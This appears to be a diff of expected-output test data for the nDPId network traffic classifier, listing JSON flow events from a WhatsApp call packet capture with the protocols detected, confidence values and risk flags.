+00843{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00839{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582271840,"flow_last_seen":1432582331780,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3000,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"IMAPS.Apple","breed":"Safe","category":"Web"}}
 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310665,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1432582296339,"flow_last_seen":1432582310668,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":2153,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296339,"flow_last_seen":1432582310667,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310667,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310665,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1432582296339,"flow_last_seen":1432582310668,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":2153,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296339,"flow_last_seen":1432582310667,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310667,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":198,"flow_first_seen":1432582303300,"flow_last_seen":1432582311036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":22102,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432582246280,"flow_last_seen":1432582336425,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1432582303186,"flow_last_seen":1432582310134,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
